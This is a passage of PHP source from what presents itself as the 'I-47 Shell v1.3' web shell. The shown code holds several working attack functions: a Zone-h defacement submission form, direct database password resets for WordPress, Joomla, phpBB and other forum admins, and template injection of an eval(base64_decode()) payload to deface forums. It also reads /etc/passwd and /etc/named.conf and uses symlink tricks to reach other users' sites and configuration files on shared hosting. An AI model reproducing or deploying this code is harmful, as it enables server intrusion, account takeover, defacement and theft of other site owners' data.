1559           echo ' < br > < center > < blink > < fontcolor = limesize = 3 > proxy . phpwascreatedin'.htmlentities($_GET['path']).' < / font > < / blink > < / center > < br > < br > ';
1560           chmod($_GET['path'].' / proxy . php', 0777);
1561       }else{
1562           echo ' < br > < center > < fontcolor = redsize = 3 > < b > Directoryisnotwritable! < / b > < br > < / font > < / center > < br > ';
1563       }
1564   }
1565   
1566   else if(isset($_GET['about']))
1567   { ?>
1568       <bR><center>
1569         <p><font color=red size=6><u>I-47 Shell v1.3</u></font><br>
1570             <font color=red size=5>[--==Coded By Arjun==--]</font><br>
1571           <br><font class="txt"><pre>
1572 ================================
1573   -----           /   -------
1574      |          /           /
1575     |    ___  /___|       /
1576    |             |      /
1577 -----           |     /
1578 
1579 ================================
1580 
1581       </pre></font></center>
1582       <font class="txt">I-47 Shell is a PHP Script, created for checking the vulnerability and security of any web server or website. With this PHP script, the owner can check various vulnerablities present in the web server. This shell provide you almost every facility that the security analyst need for penetration testing. This is a "All In One" php script, so that the user do not need to go anywhere else.<br> This script is coded by an Indian Ethical Hacker.<br> This script is only coded for education purpose or testing on your own server.The developer of the script is not responsible for any damage or misuse of it</font><br><br><center><font color=red size=5>GREETZ To All Indian Hackers</font><br><font color=red size=6>| &#2332;&#2351; &#2361;&#2367;&#2344;&#2381;&#2342; |</font></center><br>
1583   <?php }
1584   
1585   // Zone-h Poster
1586   else if(isset($_GET["zone"]))
1587   {  
1588       if(!function_exists('curl_version'))
1589       {
1590           echo "<pre class=ml1 style='margin - top : 5px'><center><font color=red>PHP CURL NOT EXIT</font></center></pre>";
1591       }
1592       ?>
1593       <center><font size="4" color="#FF0000">Zone-h Poster</font></center>
1594       <form action="<?php echo $self; ?>" method="post">
1595       <table align="center" cellpadding="5" border="0">
1596       <tr>
1597       <td>
1598       <input type="text" name="defacer" value="Attacker" class="box" /></td></tr>
1599       <tr><td>
1600       <select name="hackmode" class="box">
1601           <option >--------SELECT--------</option>
1602           <option value="1">known vulnerability (i.e. unpatched system)</option>
1603           <option value="2" >undisclosed (new) vulnerability</option>
1604           <option value="3" >configuration / admin. mistake</option>
1605           <option value="4" >brute force attack</option>
1606           <option value="5" >social engineering</option>
1607           <option value="6" >Web Server intrusion</option>
1608           <option value="7" >Web Server external module intrusion</option>
1609           <option value="8" >Mail Server intrusion</option>
1610           <option value="9" >FTP Server intrusion</option>
1611           <option value="10" >SSH Server intrusion</option>
1612           <option value="11" >Telnet Server intrusion</option>
1613           <option value="12" >RPC Server intrusion</option>
1614           <option value="13" >Shares misconfiguration</option>
1615           <option value="14" >Other Server intrusion</option>
1616           <option value="15" >SQL Injection</option>
1617           <option value="16" >URL Poisoning</option>
1618           <option value="17" >File Inclusion</option>
1619           <option value="18" >Other Web Application bug</option>
1620           <option value="19" >Remote administrative panel access bruteforcing</option>
1621           <option value="20" >Remote administrative panel access password guessing</option>
1622           <option value="21" >Remote administrative panel access social engineering</option>
1623           <option value="22" >Attack against administrator(password stealing/sniffing)</option>
1624           <option value="23" >Access credentials through Man In the Middle attack</option>
1625           <option value="24" >Remote service password guessing</option>
1626           <option value="25" >Remote service password bruteforce</option>
1627           <option value="26" >Rerouting after attacking the Firewall</option>
1628           <option value="27" >Rerouting after attacking the Router</option>
1629           <option value="28" >DNS attack through social engineering</option>
1630           <option value="29" >DNS attack through cache poisoning</option>
1631           <option value="30" >Not available</option>
1632       </select>
1633       </td></tr>
1634       <tr><td>
1635       <select name="reason" class="box">
1636           <option >--------SELECT--------</option>
1637           <option value="1" >Heh...just for fun!</option>
1638           <option value="2" >Revenge against that website</option>
1639           <option value="3" >Political reasons</option>
1640           <option value="4" >As a challenge</option>
1641           <option value="5" >I just want to be the best defacer</option>
1642           <option value="6" >Patriotism</option>
1643           <option value="7" >Not available</option>
1644       </select></td></tr>
1645       <tr><td>
1646       <textarea name="domain" class="box" cols="47" rows="9">List Of Domains</textarea></td></tr>
1647       <tr><td>
1648       <input type="submit" class="but" value="Send Now !" name="SendNowToZoneH" /></td></tr></table>
1649       </form>
1650   <?php }
1651   
1652   // Password Change Forums
1653   else if(isset($_POST['forumpass']))
1654   {
1655       $localhost =  $_POST['f1']; 
1656       $database =  $_POST['f2']; 
1657       $username =  $_POST['f3']; 
1658       $password =  $_POST['f4']; 
1659       $prefix    =  $_POST['prefix'];
1660       $uid = $_POST['uid'];
1661       $newpass = $_POST['newpass'];
1662       if($_POST['forums'] == "vb")
1663       {   
1664           $con = mysql_connect($localhost,$username,$password);
1665           $db = mysql_select_db($database,$con);
1666           $salt = "eghjghrtd";
1667           $newpassword = md5(md5($newpass) . $salt);
1668           if($prefix == "" || $prefix == null)
1669               $sql = mysql_query("update user set password = '$newpassword', salt = '$salt' where userid = '$uid'");
1670           else
1671               $sql = mysql_query("update ".$prefix."user set password = '$newpassword', salt = '$salt' where userid = '$uid'");
1672           if($sql)
1673           {
1674               mysql_close($con);
1675               header("Location:$self?forum&passwordchange&changed");
1676               ob_end_flush();
1677           }
1678           else
1679               header("Location:$self?forum&passwordchange&cannotchange");
1680       }
1681       if($_POST['forums'] == "mybb")
1682       {   
1683           $con = mysql_connect($localhost,$username,$password);
1684           $db = mysql_select_db($database,$con);
1685           $salt = "jeghj";
1686           $newpassword = md5(md5($salt).$newpass);
1687           if($prefix == "" || $prefix == null)
1688               $sql = mysql_query("update mybb_users set password = '$newpassword', salt = '$salt' where uid = '$uid'");
1689           else
1690               $sql = mysql_query("update ".$prefix."users set password = '$newpassword', salt = '$salt' where uid = '$uid'");
1691           if($sql)
1692           {
1693               mysql_close($con);
1694               header("Location:$self?forum&passwordchange&changed");
1695               ob_end_flush();
1696           }
1697           else
1698               header("Location:$self?forum&passwordchange&cannotchange");
1699       }
1700       if($_POST['forums'] == "smf")
1701       {   
1702           $con = mysql_connect($localhost,$username,$password);
1703           $db = mysql_select_db($database,$con);
1704           $salt = "eghj";
1705               
1706           if($prefix == "" || $prefix == null)
1707           {
1708               $result = mysql_query("select member_name from smf_members where id_member = 1");
1709               $row = mysql_fetch_array($result);
1710               $membername = $row['member_name'];
1711               $newpassword = sha1(strtolower($membername).$newpass);
1712               $sql = mysql_query("update smf_members set passwd = '$newpassword' where id_member = '$uid'");
1713           }
1714           else
1715           {
1716               $result = mysql_query("select member_name from ".$prefix."members where id_member = 1");
1717               $row = mysql_fetch_array($result);
1718               $membername = $row['member_name'];
1719               $newpassword = sha1(strtolower($membername).$newpass);
1720               $sql = mysql_query("update ".$prefix."members set passwd = '$newpassword' where id_member = '$uid'");
1721           }
1722           if($sql)
1723           {
1724               mysql_close($con);
1725               header("Location:$self?forum&passwordchange&changed");
1726               ob_end_flush();
1727           }
1728           else
1729               header("Location:$self?forum&passwordchange&cannotchange");
1730       }
1731       if($_POST['forums'] == "phpbb")
1732       {   
1733           $con = mysql_connect($localhost,$username,$password);
1734           $db = mysql_select_db($database,$con);
1735           
1736           $newpassword = md5($newpass);echo $newpassword;
1737           if(empty($prefix) || $prefix == null)
1738               $sql = mysql_query("update phpbb_users set user_password = '$newpassword' where user_id = '$uid'");
1739           else
1740               $sql = mysql_query("update ".$prefix."users set user_password = '$newpassword' where user_id = '$uid'");
1741           if($sql)
1742           {
1743               mysql_close($con);
1744               header("Location:$self?forum&passwordchange&changed");
1745               ob_end_flush();
1746           }
1747           else
1748               header("Location:$self?forum&passwordchange&cannotchange");
1749       }
1750       if($_POST['forums'] == "ipb")
1751       {   echo "gjhfg";
1752           $con = mysql_connect($localhost,$username,$password);
1753           $db = mysql_select_db($database,$con);
1754           $salt = "eghj";
1755           $newpassword = md5(md5($salt).md5($newpass));
1756           if($prefix == "" || $prefix == null)
1757               $sql = mysql_query("update members set members_pass_hash = '$newpassword', members_pass_salt = '$salt' where member_id = '$uid'");
1758           else
1759               $sql = mysql_query("update ".$prefix."members set members_pass_hash = '$newpassword', members_pass_salt = '$salt' where member_id = '$uid'");
1760           if($sql)
1761           {
1762               mysql_close($con);
1763               header("Location:$self?forum&passwordchange&changed");
1764               ob_end_flush();
1765           }
1766           else
1767               header("Location:$self?forum&passwordchange&cannotchange");
1768       }
1769       if($_POST['forums'] == "wp")
1770       {   
1771           $uname = $_POST['uname'];
1772           $con = mysql_connect($localhost,$username,$password);
1773           $db = mysql_select_db($database,$con);
1774 
1775           $newpassword = md5($newpass);
1776           if($prefix == "" || $prefix == null)
1777               $sql = mysql_query("update wp_users set user_pass = '$newpassword', user_login = '$uname' where ID = '$uid'");
1778           else
1779               $sql = mysql_query("update ".$prefix."users set user_pass = '$newpassword', user_login = '$uname' where ID = '$uid'");
1780           if($sql)
1781           {
1782               mysql_close($con);
1783               header("Location:$self?forum&passwordchange&changed#wordp");
1784               ob_end_flush();
1785           }
1786           else
1787               header("Location:$self?forum&passwordchange&cannotchange#wordp");
1788       }
1789       if($_POST['forums'] == "joomla")
1790       {   
1791           $uname = $_POST['uname'];
1792           $con = mysql_connect($localhost,$username,$password);
1793           $db = mysql_select_db($database,$con);
1794 
1795           $newpassword = md5($newpass);
1796           if($prefix == "" || $prefix == null)
1797               $sql = mysql_query("update jos_users set password = '$newpassword', username = '$uname' where name = 'SuperUser'");
1798           else
1799               $sql = mysql_query("update ".$prefix."users set password = '$newpassword', username = '$uname' where name = 'SuperUser' OR name = 'Administrator'");
1800           if($sql)
1801           {
1802               mysql_close($con);
1803               header("Location:$self?forum&passwordchange&changed#jooml");
1804               ob_end_flush();
1805           }
1806           else
1807               header("Location:$self?forum&passwordchange&cannotchange#jooml");
1808       }
1809   }
1810   
1811   // Deface Forums
1812   else if(isset($_POST['forumdeface']))
1813   {
1814       $localhost =  $_POST['f1']; 
1815       $database =  $_POST['f2']; 
1816       $username =  $_POST['f3']; 
1817       $password =  $_POST['f4']; 
1818       $index    =  $_POST['index'];
1819       $prefix    =  $_POST['prefix'];
1820       if($_POST['forumdeface'] == "Hack VB")
1821       {
1822           if($database=$_POST['f2'])
1823           {
1824               $con =@ mysql_connect($localhost,$username,$password) or die; 
1825               $db =@ mysql_select_db($database,$con) or die;  
1826               $index=str_replace('"','\"',$index); 
1827               $attack  = " {
1828                             \$ {
1829                                 eval(base64_decode(\'"; 
1830               $attack .= base64_encode("echo \"$index\";"); 
1831               $attack .= "\'))}}{\${exit()}}</textarea>"; 
1832               if($prefix == "" || $prefix == null)
1833                   $query = "UPDATE template SET template = '$attack'" or die; 
1834               else
1835                   $query = "UPDATE ".$prefix."template SET template = '$attack'" or die; 
1836               $result =@ mysql_query($query,$con); 
1837               if($result)
1838               { 
1839                   echo "<center><font color=lime size=4><blink>Forum Defaced Successfully</blink></font></center>";
1840               }
1841               else
1842               {
1843                   echo "<center><font color=red size=4><blink>Cannot Deface Forum</blink></font></center>";
1844               }
1845           }
1846       }
1847       else if($_POST['forumdeface'] == "Hack MyBB")
1848       {
1849           $localhost =  $_POST['f1']; 
1850           $database =  $_POST['f2']; 
1851           $username =  $_POST['f3']; 
1852           $password =  $_POST['f4']; 
1853           $index    =  $_POST['index'];
1854           $prefix    =  $_POST['prefix'];
1855           if($database=$_POST['f2'])
1856           {
1857               $con =@ mysql_connect($localhost,$username,$password) or die; 
1858               $db =@ mysql_select_db($database,$con) or die;  
1859               //$index=str_replace('"','\"',$index); 
1860               $attack  = " {
1861                                     \$ {
1862                                         eval(base64_decode(\'"; 
1863               $attack .= base64_encode("echo \"$index\";"); 
1864               $attack .= "\'))}}{\${exit()}}</textarea>"; 
1865               $attack  = str_replace('"',"\'",$attack);
1866           
1867               if($prefix == "" || $prefix == null)
1868                   $query = "UPDATE mybb_templates SET template = '$attack'" or die; 
1869               else
1870                   $query = "UPDATE ".$prefix."templates SET template = '$attack'" or die; 
1871               $result =@ mysql_query($query,$con);
1872               if($result)
1873               { 
1874                   echo "<center><font color=lime size=4><blink>Forum Defaced Successfully</blink></font></center>";
1875               }
1876               else
1877               {
1878                   echo "<center><font color=red size=4><blink>Cannot Deface Forum</blink></font></center>";
1879               }
1880           }
1881       }
1882       else if($_POST['forumdeface'] == "Hack SMF")
1883       {
1884           $localhost =  $_POST['f1']; 
1885           $database =  $_POST['f2']; 
1886           $username =  $_POST['f3']; 
1887           $password =  $_POST['f4']; 
1888           $index    =  $_POST['index'];
1889           $prefix    =  $_POST['prefix'];
1890           if($database = $_POST['f2'])
1891           {
1892               $con =@ mysql_connect($localhost,$username,$password) or die; 
1893               $db =@ mysql_select_db($database,$con) or die;  
1894               if($prefix == "" || $prefix == null)
1895                   $query = "UPDATE smf_categories SET name='$index' WHERE id_cat='$catid'" or die; 
1896               else
1897                   $query = "UPDATE ".$prefix."categories SET name='$index' WHERE id_cat='$catid'" or die; 
1898               $result =@ mysql_query($query,$con);
1899               if($result)
1900               { 
1901                   echo "<center><font color=lime size=4><blink>Forum Index Changed Successfully</blink></font></center>";
1902               }
1903               else
1904               {
1905                   echo "<center><font color=red size=4><blink>Cannot Deface Forum</blink></font></center>";
1906               }
1907           }
1908       }
1909       else if($_POST['forumdeface'] == "Hack IPB")
1910       {
1911           $localhost =  $_POST['f1']; 
1912           $database =  $_POST['f2']; 
1913           $username =  $_POST['f3']; 
1914           $password =  $_POST['f4']; 
1915           $index    =  $_POST['index'];
1916           if($database=$_POST['f2'])
1917           {
1918               $IPB = "ibf_skin_sets";
1919               $con =@ mysql_connect($localhost,$username,$password) or die; 
1920               $db =@ mysql_select_db($database,$con) or die;  
1921               $query = "UPDATE $IPB SET set_cache_wrapper = '$index'" or die; 
1922               $result =@ mysql_query($query,$con);
1923               if($result)
1924               { 
1925                   echo "<center><font color=lime size=4><blink>Forum Defaced Successfully</blink></font></center>";
1926               }
1927               else
1928               {
1929                   echo "<center><font color=red size=4><blink>Cannot Deface Forum</blink></font></center>";
1930               }
1931           }
1932       }
1933       else if($_POST['forumdeface'] == "Hack wordpress")
1934       {
1935           $localhost =  $_POST['f1']; 
1936           $database =  $_POST['f2']; 
1937           $username =  $_POST['f3']; 
1938           $password =  $_POST['f4']; 
1939           $catid = $_POST['f5'];
1940           $index    =  $_POST['index'];
1941           $prefix    =  $_POST['prefix'];
1942           if($database=$_POST['f2'])
1943           {
1944               $con =@ mysql_connect($localhost,$username,$password) or die; 
1945               $db =@ mysql_select_db($database,$con) or die;  
1946               if($prefix == "" || $prefix == null)
1947                   $query = "UPDATE wp_posts SET post_title='$index' WHERE ID='$catid'" or die; 
1948               else
1949                   $query = "UPDATE ".$prefix."posts SET post_title='$index' WHERE ID='$catid'" or die;
1950               $result =@ mysql_query($query,$con);
1951               if($result)
1952               { 
1953                   echo "<center><font color=lime size=4><blink>Forum Defaced Successfully</blink></font></center>";
1954               }
1955               else
1956               {
1957                   echo "<center><font color=red size=4><blink>Cannot Deface Forum</blink></font></center>";
1958               }
1959           }
1960       }
1961   }
1962   
1963   
1964   // Get Domains
1965   else if(isset($_REQUEST["symlinkserver"]))
1966   {
1967       ?>
1968       <center><table><tr><td><a href="<?php echo $self; ?>?domains&symlinkserver"><font color="lime" size="4">| Get Domains |</font></a></td>
1969       <td><a href="<?php echo $self; ?>?users&symlinkserver"><font color="lime" size="4">| Users & Domains |</font></a></td>
1970       <td><a href="<?php echo $self; ?>?symlink&symlinkserver"><font color="lime" size="4">| Symlink Server |</font></a></td>
1971       <td><a href="<?php echo $self; ?>?symlinkfile&symlinkserver"><font color="lime" size="4">| Symlink File |</font></a></td>
1972       <td><a href="<?php echo $self; ?>?script&symlinkserver"><font color="lime" size="4">| Script Locator |</font></a></td>
1973       </tr></table></center><br>
1974       <?php 
1975       if(isset($_GET["domains"])) 
1976       {
1977       ?>   <center><iframe src="<?php echo 'http : //sameip.org/ip/' . getenv('SERVER_ADDR');
1978                                          ?>" width="80%" height="1000px"></iframe></center>
1979        <?php
1980                                     } else if (isset($_GET["users"])) {
1981                                         $d0mains = @file("/etc/named.conf");
1982                                         if (!$d0mains) {
1983                                             die("<center><font size=4 color=red>cannot ReaD -> [ /etc/named.conf ]</font><center>");
1984                                         }
1985                                         $url = 'http://' . $_SERVER['SERVER_NAME'];
1986                                         echo "<table align=center border=1 style='width:40%;'><tr><td align=center><font size=4 color=red>Domains</font></td><td align=center><font size=4 color=red>Users</font></td></tr>";
1987                                         foreach ($d0mains as $d0main) {
1988                                             if (eregi("zone", $d0main)) {
1989                                                 preg_match_all('#zone "(.*)"#', $d0main, $domains);
1990                                                 flush();
1991                                                 if (strlen(trim($domains[1][0])) > 2) {
1992                                                     $user = posix_getpwuid(@fileowner("/etc/valiases/" . $domains[1][0]));
1993                                                     echo "<tr><td><a href=http://www." . $domains[1][0] . "/><font size=3 color=lime>" . $domains[1][0] . "</font></a></td><td><font size=3 color=lime>" . $user['name'] . "</font></td></tr>";
1994                                                     flush();
1995                                                 }
1996                                             }
1997                                         }
1998                                         echo "</table>";
1999                                     } else if (isset($_GET["symlink"])) {
2000                                         $d0mains = @file("/etc/named.conf");
2001                                         if ($d0mains) {
2002                                             @mkdir("I47", 0777);
2003                                             @chdir("I47");
2004                                             execmd("ln -s / root");
2005                                             $file3 = 'Options all 
2006    DirectoryIndex Sux.html 
2007    AddType text/plain .php 
2008    AddHandler server-parsed .php 
2009     AddType text/plain .html 
2010    AddHandler txt .html 
2011    Require None 
2012    Satisfy Any        
2013   ';
2014                                             $fp3 = fopen('.htaccess', 'w');
2015                                             $fw3 = fwrite($fp3, $file3);
2016                                             @fclose($fp3);
2017                                             echo "<table align=center border=1 style='width:40%;'><tr><td align=center><font size=4 color=red>Domains</font></td><td align=center><font size=4 color=red>Users</font></td><td align=center><font size=4 color=red>Symlink</font></td></tr>";
2018                                             foreach ($d0mains as $d0main) {
2019                                                 if (eregi("zone", $d0main)) {
2020                                                     preg_match_all('#zone "(.*)"#', $d0main, $domains);
2021                                                     flush();
2022                                                     if (strlen(trim($domains[1][0])) > 2) {
2023                                                         $user = posix_getpwuid(@fileowner("/etc/valiases/" . $domains[1][0]));
2024                                                         echo "<tr><td><a href=http://www." . $domains[1][0] . "/><font size=3 color=lime>" . $domains[1][0] . "</font></a></td><td><font size=3 color=lime>" . $user['name'] . "</font></td><td><a href='/I47/root/home/" . $user['name'] . "/public_html' target='_blank'><font size=3 color=lime>Symlink</font></a></td></tr>";
2025                                                         flush();
2026                                                     }
2027                                                 }
2028                                             }
2029                                             echo "</table>";
2030                                         } else {
2031                                             $TEST = @file('/etc/passwd');
2032                                             if ($TEST) {
2033                                                 @mkdir("I47", 0777);
2034                                                 @chdir("I47");
2035                                                 execmd("ln -s / root");
2036                                                 $file3 = 'Options all 
2037            DirectoryIndex Sux.html 
2038            AddType text/plain .php 
2039            AddHandler server-parsed .php 
2040             AddType text/plain .html 
2041            AddHandler txt .html 
2042            Require None 
2043            Satisfy Any        
2044           ';
2045                                                 $fp3 = fopen('.htaccess', 'w');
2046                                                 $fw3 = fwrite($fp3, $file3);
2047                                                 @fclose($fp3);
2048                                                 echo "<table align=center border=1 style='width:40%;'><tr><td align=center><font size=4 color=red>Users</font></td><td align=center><font size=4 color=red>Symlink</font></td></tr>";
2049                                                 $file = fopen("/etc/passwd", "r") or exit("Unable to open file!");
2050                                                 //Output a line of the file until the end is reached
2051                                                 while (!feof($file)) {
2052                                                     $s = fgets($file);
2053                                                     $matches = array();
2054                                                     $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
2055                                                     $matches = str_replace("home/", "", $matches[1]);
2056                                                     if (strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named") continue;
2057                                                     echo "<tr><td align=center><font size=3 color=lime>" . $matches . "</td>";
2058                                                     echo "<td align=center><font size=3 color=lime><a href=/I47/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
2059                                                 }
2060                                                 fclose($file);
2061                                                 echo "</table>";
2062                                             } else {
2063                                                 @mkdir("I47", 0777);
2064                                                 @chdir("I47");
2065                                                 execmd("ln -s / root");
2066                                                 $file3 = 'Options all 
2067            DirectoryIndex Sux.html 
2068            AddType text/plain .php 
2069            AddHandler server-parsed .php 
2070             AddType text/plain .html 
2071            AddHandler txt .html 
2072            Require None 
2073            Satisfy Any        
2074           ';
2075                                                 $fp3 = fopen('.htaccess', 'w');
2076                                                 $fw3 = fwrite($fp3, $file3);
2077                                                 @fclose($fp3);
2078                                                 echo "<table align=center border=1 style='width:40%;'><tr><td align=center><font size=4 color=red>Users</font></td><td align=center><font size=4 color=red>Symlink</font></td></tr>";
2079                                                 $temp = "";
2080                                                 $val1 = 0;
2081                                                 $val2 = 1000;
2082                                                 for (;$val1 <= $val2;$val1++) {
2083                                                     $uid = @posix_getpwuid($val1);
2084                                                     if ($uid) $temp.= join(':', $uid) . "
2085 ";
2086                                                 }
2087                                                 echo '<br/>';
2088                                                 $temp = trim($temp);
2089                                                 $file5 = fopen("test.txt", "w");
2090                                                 fputs($file5, $temp);
2091                                                 fclose($file5);
2092                                                 $file = fopen("test.txt", "r") or exit("Unable to open file!");
2093                                                 while (!feof($file)) {
2094                                                     $s = fgets($file);
2095                                                     $matches = array();
2096                                                     $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
2097                                                     $matches = str_replace("home/", "", $matches[1]);
2098                                                     if (strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named") continue;
2099                                                     echo "<tr><td align=center><font size=3 color=lime>" . $matches . "</td>";
2100                                                     echo "<td align=center><font size=3 color=lime><a href=/I47/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
2101                                                 }
2102                                                 fclose($file);
2103                                                 echo "</table>";
2104                                                 unlink("test.txt");
2105                                             }
2106                                         }
2107                                     } else if (isset($_GET["symlinkfile"])) {
2108                                         if (!isset($_GET['file'])) {
2109 ?>
2110                    <center>
2111                    <form action="<?php echo $self; ?>">
2112                    <input type="hidden" name="symlinkserver">
2113                    <input type="hidden" name="symlinkfile">
2114                    <input type="text" class="box" name="file" size="50" value="">
2115                    <input type="submit" value="Create Symlink" class="but">
2116                    </form></center>
2117                    <br><br>
2118                    <?php
2119                                         } else {
2120                                             $fakedir = "cx";
2121                                             $fakedep = 16;
2122                                             $num = 0; // offset of symlink.$num
2123                                             if (!empty($_GET['file'])) $file = $_GET['file'];
2124                                             else if (!empty($_POST['file'])) $file = $_POST['file'];
2125                                             else $file = "";
2126                                             if (empty($file)) exit;
2127                                             if (!is_writable(".")) die("not writable directory");
2128                                             $level = 0;
2129                                             for ($as = 0;$as < $fakedep;$as++) {
2130                                                 if (!file_exists($fakedir)) mkdir($fakedir);
2131                                                 chdir($fakedir);
2132                                             }
2133                                             while (1 < $as--) chdir("..");
2134                                             $hardstyle = explode("/", $file);
2135                                             for ($a = 0;$a < count($hardstyle);$a++) {
2136                                                 if (!empty($hardstyle[$a])) {
2137                                                     if (!file_exists($hardstyle[$a])) mkdir($hardstyle[$a]);
2138                                                     chdir($hardstyle[$a]);
2139                                                     $as++;
2140                                                 }
2141                                             }
2142                                             $as++;
2143                                             while ($as--) chdir("..");
2144                                             @rmdir("fakesymlink");
2145                                             @unlink("fakesymlink");
2146                                             @symlink(str_repeat($fakedir . "/", $fakedep), "fakesymlink");
2147                                             // this loop will skip allready created symlinks.
2148                                             while (1) if (true == (@symlink("fakesymlink/" . str_repeat("../", $fakedep - 1) . $file, "symlink" . $num))) break;
2149                                             else $num++;
2150                                             @unlink("fakesymlink");
2151                                             mkdir("fakesymlink");
2152                                             die('<FONT COLOR="RED">check symlink <a href="./symlink' . $num . '">symlink' . $num . '</a> file</FONT>');
2153                                         }
2154                                     } else if (isset($_REQUEST["script"])) {
2155 ?>
2156            <center><table><tr><td><a href="<?php echo $self; ?>?manually&script&symlinkserver"><font color="lime" size="4">| Do It Manually |</font></a></td>
2157        <td><a href="<?php echo $self; ?>?automatic&script&symlinkserver"><font color="lime" size="4">| Do It Automatically |</font></a></td>
2158        </tr></table></center>
2159            <?php
2160                                         if (isset($_REQUEST['manually'])) {
2161                                             if (!isset($_REQUEST['passwd'])) {
2162 ?>
2163                <center>
2164                <form action="<?php echo $self; ?>" method="post">
2165                <input type="hidden" name="manually">
2166                <input type="hidden" name="script">
2167                <input type="hidden" name="symlinkserver">
2168                <textarea class="box" rows="16" cols="100" name="passwd"></textarea><br>
2169                <input type="submit" value="Get Config" class="but">
2170                </form>
2171                </center>
2172                <?php
2173                                             } else {
2174                                                 $getetc = trim($_REQUEST['passwd']);
2175                                                 mkdir("I47SPTS");
2176                                                 chdir("I47SPTS");
2177                                                 $myfile = fopen("test.txt", "w");
2178                                                 fputs($myfile, $getetc);
2179                                                 fclose($myfile);
2180                                                 $file = fopen("test.txt", "r") or exit("Unable to open file!");
2181                                                 while (!feof($file)) {
2182                                                     $s = fgets($file);
2183                                                     $matches = array();
2184                                                     $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
2185                                                     $matches = str_replace("home/", "", $matches[1]);
2186                                                     if (strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named") continue;
2187                                                     syml($matches, $matches);
2188                                                 }
2189                                                 fclose($file);
2190                                                 unlink("test.txt");
2191                                                 echo "<center><font color=lime size=3>[ Done ]</font></center>";
2192                                                 echo "<br><center><a href=I47SPTS target=_blank><font size=3 color=#009900>| Go Here |</font></a></center>";
2193                                             }
2194                                         } else if (isset($_REQUEST['automatic'])) {
2195                                             $d0mains = @file("/etc/named.conf");
2196                                             if ($d0mains) {
2197                                                 mkdir("I47SPT");
2198                                                 chdir("I47SPT");
2199                                                 foreach ($d0mains as $d0main) {
2200                                                     if (eregi("zone", $d0main)) {
2201                                                         preg_match_all('#zone "(.*)"#', $d0main, $domains);
2202                                                         flush();
2203                                                         if (strlen(trim($domains[1][0])) > 2) {
2204                                                             $user = posix_getpwuid(@fileowner("/etc/valiases/" . $domains[1][0]));
2205                                                             syml($user['name'], $domains[1][0]);
2206                                                         }
2207                                                     }
2208                                                 }
2209                                                 echo "<center><font color=lime size=3>[ Done ]</font></center>";
2210                                                 echo "<br><center><a href=I47SPT target=_blank><font size=3 color=#009900>| Go Here |</font></a></center>";
2211                                             } else {
2212                                                 mkdir("I47SPTS");
2213                                                 chdir("I47SPTS");
2214                                                 $temp = "";
2215                                                 $val1 = 0;
2216                                                 $val2 = 1000;
2217                                                 for (;$val1 <= $val2;$val1++) {
2218                                                     $uid = @posix_getpwuid($val1);
2219                                                     if ($uid) $temp.= join(':', $uid) . "
2220 ";
2221                                                 }
2222                                                 echo '<br/>';
2223                                                 $temp = trim($temp);
2224                                                 $file5 = fopen("test.txt", "w");
2225                                                 fputs($file5, $temp);
2226                                                 fclose($file5);
2227                                                 $file = fopen("test.txt", "r") or exit("Unable to open file!");
2228                                                 while (!feof($file)) {
2229                                                     $s = fgets($file);
2230                                                     $matches = array();
2231                                                     $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
2232                                                     $matches = str_replace("home/", "", $matches[1]);
2233                                                     if (strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named") continue;
2234                                                     syml($matches, $matches);
2235                                                 }
2236                                                 fclose($file);
2237                                                 echo "</table>";
2238                                                 unlink("test.txt");
2239                                                 echo "<center><font color=lime size=3>[ Done ]</font></center>";
2240                                                 echo "<br><center><a href=I47SPTS target=_blank><font size=3 color=#009900>| Go Here |</font></a></center>";
2241                                             }
2242                                         }
2243                                     }
2244                                 }
2245                                 // Exploit Search
2246                                 else if (isset($_GET["exploit"])) {
2247                                     if (!isset($_GET["rootexploit"])) {
2248 ?>
2249            <center>
2250            <form action="<?php echo $self; ?>" method="get" target="_blank">
2251            <input type="hidden" name="exploit">
2252            <table border="1" cellpadding="5" cellspacing="4" style="width:50%;">
2253            <tr>
2254                <td style="height:60px;">
2255            <font size="4" color="lime">Select Website</font></td><td>
2256            <p><select id="rootexploit" name="rootexploit" class="box">
2257                <option value="exploit-db">Exploit-db</option>
2258                <option value="packetstormsecurity">Packetstormsecurity</option>
2259                <option value="exploitsearch">Exploitsearch</option>
2260                <option value="shodanhq">Shodanhq</option>
2261            </select></p></td></tr><tr><td colspan="2" align="center"  style="height:40px;">
2262            <input type="submit" value="Search" class="but"></td></tr></table>
2263            </form></center><br>
2264        
2265        <?php
2266                                     } else {
2267                                         //exploit search
2268                                         $Lversion = php_uname(r);
2269                                         $OSV = php_uname(s);
2270                                         if (eregi('Linux', $OSV)) {
2271                                             $Lversion = substr($Lversion, 0, 6);
2272                                             if ($_GET['rootexploit'] == "exploit-db") {
2273                                                 header("Location:http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=Linux+Kernel+$Lversion");
2274                                             } else if ($_GET['rootexploit'] == "packetstormsecurity") {
2275                                                 header("Location:http://www2.packetstormsecurity.org/cgi-bin/search/search.cgi?searchvalue=Linux+Kernel+$Lversion");
2276                                             } else if ($_GET['rootexploit'] == "exploitsearch") {
